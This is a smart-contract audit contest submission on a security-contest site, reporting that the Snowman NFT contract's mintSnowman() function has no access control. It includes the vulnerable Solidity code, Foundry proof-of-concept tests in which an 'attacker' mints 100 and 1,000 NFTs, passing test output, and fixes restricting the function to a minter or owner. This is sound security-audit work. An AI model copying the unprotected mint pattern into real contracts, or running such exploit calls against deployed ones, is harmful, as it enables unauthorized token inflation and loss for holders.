Snowman Merkle Airdrop

AI First Flight #10

Beginner FriendlyFoundrySolidityNFT

EXP

View results

Submission Details

Severity: high

Valid

Unrestricted mintSnowman() allows anyone to bypass the airdrop and mint unlimited NFTs

michou16

Root + Impact

Description

The normal behavior is that Snowman NFTs are minted only through the SnowmanAirdrop.claimSnowman() flow after the receiver passes the airdrop checks: holding Snow tokens, providing a valid EIP-712 signature, and being included in the Merkle tree.

The issue is that Snowman.mintSnowman(address receiver, uint256 amount) is an unrestricted external function. Any arbitrary caller can bypass the airdrop contract and mint any number of Snowman NFTs directly, without a valid Merkle proof, without a signature, and without holding or spending Snow tokens.

contract Snowman is ERC721, Ownable {

uint256 private s_TokenCounter;

event SnowmanMinted(address indexed receiver, uint256 indexed numberOfSnowman);

constructor(string memory _SnowmanSvgUri)

ERC721("Snowman Airdrop", "SNOWMAN")

Ownable(msg.sender)

{

s_TokenCounter = 0;

s_SnowmanSvgUri = _SnowmanSvgUri;

}

// @> Root cause: this mint function is external and has no access control.

// @> Any address can call it directly and choose any receiver and amount.

function mintSnowman(address receiver, uint256 amount) external {

for (uint256 i = 0; i < amount; i++) {

// @> Unrestricted minting happens here.

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

Risk

Likelihood:

Any externally owned account or contract can call Snowman.mintSnowman() directly because the function is external and has no onlyOwner, onlyMinter, or msg.sender == airdrop restriction.
The vulnerable path occurs whenever an attacker submits a transaction directly to the Snowman NFT contract with an arbitrary receiver and amount.

Impact:

An attacker can mint unlimited Snowman NFTs for free, fully bypassing the intended Merkle airdrop eligibility checks.
The NFT supply and distribution assumptions are broken because unauthorized users can inflate the collection without holding Snow tokens, submitting a valid signature, or interacting with SnowmanAirdrop.claimSnowman().

Proof of Concept

function testAnyoneCanMintUnlimitedSnowmenWithoutAirdropOrSnow() public {

address attacker = makeAddr("attacker");

assertEq(nft.balanceOf(attacker), 0);

vm.prank(attacker);

nft.mintSnowman(attacker, 100);

assertEq(nft.balanceOf(attacker), 100);

assertEq(nft.ownerOf(0), attacker);

}

Test result:

Ran 1 test for test/TestSnowmanAirdrop.t.sol:TestSnowmanAirdrop

[PASS] testAnyoneCanMintUnlimitedSnowmenWithoutAirdropOrSnow() (gas: 3382678)

Suite result: ok. 1 passed; 0 failed; 0 skipped

Recommended Mitigation

Restrict mintSnowman() so only an authorized minter, such as the SnowmanAirdrop contract, can mint NFTs.

contract Snowman is ERC721, Ownable {

uint256 private s_TokenCounter;

string private s_SnowmanSvgUri;

+ address private s_minter;

+ error SM__NotMinter();

+ error SM__ZeroAddress();

+ modifier onlyMinter() {

+ if (msg.sender != s_minter) {

+ revert SM__NotMinter();

+ }

+ _;

+ }

+ function setMinter(address minter) external onlyOwner {

+ if (minter == address(0)) {

+ revert SM__ZeroAddress();

+ }

+ s_minter = minter;

+ }

- function mintSnowman(address receiver, uint256 amount) external {

+ function mintSnowman(address receiver, uint256 amount) external onlyMinter {

for (uint256 i = 0; i < amount; i++) {

_safeMint(receiver, s_TokenCounter);

emit SnowmanMinted(receiver, s_TokenCounter);

s_TokenCounter++;

}

After deploying SnowmanAirdrop, the owner should set it as the authorized minter:

snowman.setMinter(address(airdrop));

Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge 8 days ago

Submission Judgement Published

Validated

Assigned finding tags:

[H-01] Unrestricted NFT Minting in Snowman.sol

# Root + Impact ## Description * The Snowman NFT contract is designed to mint NFTs through a controlled airdrop mechanism where only authorized entities should be able to create new tokens for eligible recipients. * The `mintSnowman()` function lacks any access control mechanisms, allowing any external address to call the function and mint unlimited NFTs to any recipient without authorization, completely bypassing the intended airdrop distribution model. ```Solidity // Root cause in the codebase function mintSnowman(address receiver, uint256 amount) external { @> // NO ACCESS CONTROL - Any address can call this function for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } @> // NO VALIDATION - No checks on amount or caller authorization } ``` ## Risk **Likelihood**: * The vulnerability will be exploited as soon as any malicious actor discovers the contract address, since the function is publicly accessible with no restrictions * Automated scanning tools and MEV bots continuously monitor new contract deployments for exploitable functions, making discovery inevitable **Impact**: * Complete destruction of tokenomics through unlimited supply inflation, rendering all legitimate NFTs worthless * Total compromise of the airdrop mechanism, allowing attackers to mint millions of tokens and undermine the project's credibility and economic model ## Proof of Concept ```Solidity // SPDX-License-Identifier: MIT pragma solidity ^0.8.24; import {Test, console2} from "forge-std/Test.sol"; import {Snowman} from "../src/Snowman.sol"; contract SnowmanExploitPoC is Test { Snowman public snowman; address public attacker = makeAddr("attacker"); string constant SVG_URI = "data:image/svg+xml;base64,PHN2Zy4uLi4+"; function setUp() public { snowman = new Snowman(SVG_URI); } function testExploit_UnrestrictedMinting() public { console2.log("=== UNRESTRICTED MINTING EXPLOIT ==="); console2.log("Initial token counter:", snowman.getTokenCounter()); console2.log("Attacker balance before:", snowman.balanceOf(attacker)); // EXPLOIT: Anyone can mint unlimited NFTs vm.prank(attacker); snowman.mintSnowman(attacker, 1000); // Mint 1K NFTs console2.log("Final token counter:", snowman.getTokenCounter()); console2.log("Attacker balance after:", snowman.balanceOf(attacker)); // Verify exploit success assertEq(snowman.balanceOf(attacker), 1000); assertEq(snowman.getTokenCounter(), 1000); console2.log(" EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization"); } } ``` <br /> PoC Results: ```Solidity forge test --match-test testExploit_UnrestrictedMinting -vv [⠑] Compiling... [⠢] Compiling 1 files with Solc 0.8.29 [⠰] Solc 0.8.29 finished in 1.45s Compiler run successful! Ran 1 test for test/SnowmanExploitPoC.t.sol:SnowmanExploitPoC [PASS] testExploit_UnrestrictedMinting() (gas: 26868041) Logs: === UNRESTRICTED MINTING EXPLOIT === Initial token counter: 0 Attacker balance before: 0 Final token counter: 1000 Attacker balance after: 1000 EXPLOIT SUCCESSFUL - Minted 1K NFTs without authorization Suite result: ok. 1 passed; 0 failed; 0 skipped; finished in 4.28ms (3.58ms CPU time) Ran 1 test suite in 10.15ms (4.28ms CPU time): 1 tests passed, 0 failed, 0 skipped (1 total tests) ``` ## Recommended Mitigation Adding the `onlyOwner` modifier restricts the `mintSnowman()` function to only be callable by the contract owner, preventing unauthorized addresses from minting NFTs. ```diff - function mintSnowman(address receiver, uint256 amount) external { + function mintSnowman(address receiver, uint256 amount) external onlyOwner { for (uint256 i = 0; i < amount; i++) { _safeMint(receiver, s_TokenCounter); emit SnowmanMinted(receiver, s_TokenCounter); s_TokenCounter++; } } ```

Rewards breakdown

This contest has a flat reward structure with the following payouts:

Live

The contest is live. Earn rewards by submitting a finding.

Judging

Submissions are being reviewed by our AI judge. Results will be available in a few minutes.

View all submissions

Rewards Distribution

The contest is complete and the rewards are being distributed.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!